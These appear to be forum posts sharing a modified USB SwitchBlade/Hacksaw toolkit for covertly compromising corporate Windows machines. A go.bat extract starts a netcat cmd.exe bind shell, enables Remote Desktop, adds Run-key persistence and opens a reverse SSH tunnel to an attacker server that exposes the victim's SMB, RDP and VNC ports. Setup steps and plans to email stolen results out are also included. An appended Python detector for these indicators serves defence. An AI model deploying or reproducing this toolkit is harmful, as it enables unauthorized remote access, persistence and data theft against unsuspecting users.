Posts posted by greypwny
-
Well, finally I have had some time to put this together. Below is a zip file of my U3custom folder.
http://www.box.net/shared/6bm6ruod1d
Now, before this will work, you need to configure a couple of things.
First things first, you need to create an SSH account etc. on your "server". The following instructions are a HOW TO for OpenSSH public key authentication.
1) Create a RSA ssh key pair with an empty pass phrase
$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/someuser/.ssh/id_rsa): /home/someuser/.ssh/secuser_id_rsa
Enter passphrase (empty for no passphrase): [enter]
Enter same passphrase again: [enter]
Your identification has been saved in /home/someuser/.ssh/secuser_id_rsa.
Your public key has been saved in /home/someuser/.ssh/secuser_id_rsa.pub.
The key fingerprint is:
8d:ef:b0:0f:9e:b5:cb:bd:4d:e3:12:da:a6:dc:3a:84 user@host
$ cat /home/someuser/.ssh/secuser_id_rsa
Note: This is the ssh private key you just created. This is the key that gets saved on the USB drive.
$ cat /home/someuser/.ssh/secuser_id_rsa.pub
Note: This is the ssh public key you just created. Copy this for step 3 later.
2) Create a user on the system that you want the victim PC to log in to.
$ sudo useradd [uSERNAME] -c "Hacksaw test user" -d /home/[uSERNAME] -m
Note: For the newbies, replace the [uSERNAME] with an actual username like HACKSAW or something like that.
3) Set up ssh public key auth for this user
$ sudo su - [uSERNAME] -c 'mkdir ~/.ssh'
$ sudo su - [uSERNAME] -c 'chmod 755 ~/.ssh'
$ sudo su - [uSERNAME] -c 'cat > ~/.ssh/authorized_keys2'
[paste your public key from step 1]
[CTRL-D]
$ sudo su - [uSERNAME] -c 'chmod 600 ~/.ssh/authorized_keys2'
4) Test it out
$ ssh -l secuser -i /home/someuser/.ssh/secuser_id_rsa localhost
8<--snip usual login guff
$ id
uid=1001(secuser) gid=1002(secuser) groups=1002(secuser)
Note: /home/someuser/.ssh/secuser_id_rsa is the path and filename for the private key you created in step 1.
Note: If this fails for any reason, re-run the ssh command with "-vvv" for very very verbose output and look for the reason it fails.
5) Create a limited shell for this user to stop people using it for bad things, scp, etc.
Create a shell file with the following in it using whichever text editor you like; call it hacksawshell.sh and save it to /usr/local/bin/
#!/bin/bash
while [ 1 ]; do
    echo Greetings
    sleep 60
done
[CTRL-D]
$ sudo chmod 755 /usr/local/bin/hacksawshell.sh
$ sudo chsh -s /usr/local/bin/hacksawshell.sh [uSERNAME]
Note: make sure you test this, and make sure the [username] cannot get a normal shell or use scp/sftp/etc.
$ ssh -l [username] -i /home/[useraccount]/.ssh/[username]_id_rsa localhost
Last login: Thu Oct 26 16:46:33 2007 from localhost
Greetings
So now you have set up the server, and hopefully by the time you have done this the file mentioned above has downloaded.
6) Unzip the file on your machine and move the contents to your u3custom folder
If you haven't already read the above, this is all based on the GONZOR SwitchBlade. Go to http://www.users.on.net/~simmo_89/switchblade/Index.html to download his original files, and replace his u3custom folder with mine.
7) Now it is time to edit a couple of files
Edit the go.bat found in the u3custom\system\src\ssh folder.
Now, in the last line, put in the details of your ssh server.
Copy those details you have added and put them in go2.bat and go3.bat, found in the aforementioned folder.
Edit the u3custom\system\src\ssh\ssh_config file and the proxy details to be used.
8) Adding your ssh private key
In u3custom\system\src\ssh there is a file called ssh.key; please copy your private key created in step one into this folder.
9) Sendmail options
I know there is a GUI that was created for this, but I found it didn't do some of the things I wanted to do, so yet again edit
u3custom\system\send.bat
Add your mail server (SMTP) and of course the port number; this is in the line that begins with "for".
And please set the variables for emailfrom, emailto, password etc.
10) And we are almost done
I have also updated the antidote file that will hopefully kill and remove things; yet again this is built on GONZOR's.
http://www.box.net/shared/46rrt9plir
11) Create the key
Run the isocreate.cmd as per the GONZOR instructions, and then of course the Universal_customizer.exe file.
Once this is done open the executable SBCONFIG-Vxxxx.exe and make sure all items are checked.
Save your config and you're done.
I hope I haven't missed any steps in putting this together, and if I have then please let me know.
Things to note
This does not grab the settings from the user regarding the proxy details; this is something (as per step 7) I'm still working on, and I hope you can help me out. As mentioned, I'm not sure what is the best way to go, or whether I need to run a proxycfg -u command and grab those details and add them to the ssh_config file.
Thoughts and ideas welcome.
Remember it is rude not to share :)
-
We created a limited shell for this user to stop people using it for bad things, scp, etc.
#!/bin/bash
while [ 1 ]; do
echo Greetings
sleep 60
done
This seemed to be enough to keep the session alive.
Is it your proxy that is terminating the session?
I'm having some trouble in finding a site to upload the zip of my u3custom to. Does anyone have some hosting to allow me to do this or a recommendation of where to host said file?
-
I will post it shortly as I need to make sure there is nothing in there that ties it back to me personally :?
Should be up in the next day or so.
-
With all the talk that has been going on of late on hxxp://wiki.hak5.org/wiki//USB_Switchblade, I decided to put one together based on the GonZor SwitchBlade, but with a couple of modifications.
This device was to be used/tested in a corporate environment which used authenticated web proxies (though there were some unauthenticated proxies) and had no access to external SMTP servers. So using things like VNC and netcat would be useless unless the attacker were sitting on the same network. The other problem was that the user had personal firewalls enabled.
So we needed to devise a plan where all bindings for networks were made to localhost. Communications could only be established if:
* we could find and connect to an unauthenticated proxy
* outgoing port would need to be 443
* the traffic would need to be encrypted
* locate an internal smtp server for the hacksaw component
Solutions
* A wget of the proxy.pac file, a search for the word Unauthenticated and a regex that looked like an (WORK IN PROGRESS)
* netcat running in listen mode
* an SSH server listening on port 443 with a username that can only connect to a chrooted jail or at worst to a restricted shell
* the ssh certificate already on the USB key
* a piece of software called connect.exe to facilitate the CONNECT method
* openssh on the usb key
This worked to punch an undetected hole out to the real world, and with an effective reverse ssh session we now have access to netcat for shell commands, VNC and RDESKTOP to take control of the machine, and are attempting to map SMB ports to higher ports for network connectivity.
Below is an extract from my go.bat file that facilitates this
REM - go.bat ssh file
@echo on
cd System\SRC >NUL
REM .\nircmd.exe execmd .\nc -L -p 52323 -d -e cmd.exe
REM netcat running in listen mode on port 52323, running from the USB key; not good for the "thumb suck method"
md "%systemroot%\ssh"
REM create directory for SSH
xcopy ".\ssh\*.*" "%systemroot%\ssh" /c /e /y
REM copy ssh components (cut down from openssh)
cd \
md c:\bin
REM this needs to be made dynamic but hey I'm lazy
xcopy "bin\*.*" "c:\bin" /c /e /y
REM copy bin components of SSH (probably a better way to do this but hey it works)
c:
cd "%systemroot%\ssh"
nircmd.exe execmd nc -L -p 52323 -d -e cmd.exe
REM Netcat running in listen mode from the computer rather than the usb key
REG ADD "HKEY_LOCAL_MACHINE\system\currentcontrolset\control\terminal server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
REM Enable remote desktop
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v PWN /t REG_SZ /d "%systemroot%\ssh\ssh.lnk" /f
REM enable this process to begin on startup
ssh -F ssh_config -p 443 hacksaw@domain.com -i ssh.key -R 52323:localhost:52323 -R 5900:localhost:5900 -R 5800:localhost:5800 -R 52324:localhost:445 -R 3389:localhost:3389 -vvv -C
REM SSH session to the server
Extract from the config file
# This is the ssh client systemwide configuration file. This file provides
# defaults for users, and the values can be changed in per-user configuration
# files or on the command line.
StrictHostKeyChecking no
# using the connect method to get out to the web
ProxyCommand "c:\windows\ssh\connect.exe" -H IPADDRESS:PORT %h %p
This process doesn't require the user to be a local administrator and will run every time the user starts the system, even if they are on a non-split-tunnel VPN connection. There are still a couple of steps to work out how to do.
I still haven't had time to write the script that gets the IP of the unauthenticated proxy, or to work out how to bind with Outlook or another email client to send the results of the hacksaw to an email address.
Thoughts on the proxy are:
run proxycfg -u from a command prompt; if a pac file is found, do a wget and then search for the word unauthenticated, then grep for the IP address and set it as a variable.
Please offer comments or post questions to help with this approach.
USB Hacksaw/SwitchBlade for the corporate network
in USB Hacks
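From the defender's side, the go.bat extract above leaves a recognisable footprint on the host: an ssh client started with -R remote forwards for the machine's RDP/SMB/VNC ports, a netcat listener bound with -e cmd.exe, a Run-key entry pointing into %systemroot%\ssh, and fDenyTSConnections set to 0. The Python below is an added detection example and not part of the original post; the telemetry records, their field names, the rule names and the host example.invalid are all constructed here.

```python
import re
from typing import Dict, List, Tuple

# Indicators taken from the go.bat extract in the post: reverse forwards back to
# localhost, a netcat bind shell, Run-key persistence and RDP being switched on.
REVERSE_FWD = re.compile(r"-R\s+\d+:localhost:(\d+)")
NC_LISTEN = re.compile(r"(?i)\bnc(?:\.exe)?\s.*-L\b.*-e\s+cmd(?:\.exe)?")
RUN_KEY = re.compile(r"(?i)\\software\\microsoft\\windows\\currentversion\\run$")
SSH_CLIENT = re.compile(r"(?i)\bssh(?:\.exe)?\b")
SENSITIVE_PORTS = {445: "SMB", 3389: "RDP", 5900: "VNC"}


def scan_event(ev: Dict[str, str]) -> List[str]:
    """Return the rule names that fire on one telemetry record (field names constructed).
    'process' records carry a command line; 'registry' records carry key, value and data."""
    hits: List[str] = []
    if ev["type"] == "process":
        cmd = ev["cmdline"]
        if SSH_CLIENT.search(cmd):
            # Only flag -R forwards that hand the victim's RDP/SMB/VNC ports to the remote end.
            exposed = sorted({SENSITIVE_PORTS[int(p)] for p in REVERSE_FWD.findall(cmd)
                              if int(p) in SENSITIVE_PORTS})
            if exposed:
                hits.append("reverse-ssh-tunnel:" + ",".join(exposed))
        if NC_LISTEN.search(cmd):
            hits.append("netcat-bind-shell")
    elif ev["type"] == "registry":
        if RUN_KEY.search(ev["key"]) and "\\ssh\\" in ev["data"].lower():
            hits.append("run-key-persistence")
        if ev["value"].lower() == "fdenytsconnections" and ev["data"].strip() == "0":
            hits.append("rdp-enabled")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Run scan_event over a batch and return (record index, rule) pairs."""
    return [(i, h) for i, ev in enumerate(events) for h in scan_event(ev)]


# Constructed telemetry modelled on the post's go.bat; example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": "ssh -F ssh_config -p 443 hacksaw@example.invalid -i ssh.key"
     " -R 52323:localhost:52323 -R 5900:localhost:5900 -R 52324:localhost:445 -R 3389:localhost:3389 -C"},
    {"type": "process", "cmdline": "nc -L -p 52323 -d -e cmd.exe"},
    {"type": "registry", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "PWN", "data": r"C:\Windows\ssh\ssh.lnk"},
    {"type": "registry", "key": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server",
     "value": "fDenyTSConnections", "data": "0"},
    {"type": "process", "cmdline": "ssh -L 8080:localhost:80 user@example.invalid"},  # benign local forward
]
```

Running scan(SAMPLE_EVENTS) fires one rule on each of the first four records and none on the benign local forward, which is the distinction worth keeping when tuning this against real process and registry telemetry.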
I think there are enough guides out there that encapsulate what you are trying to do.
Why don't you errr, ummm use your noodle and work it out, we all had to!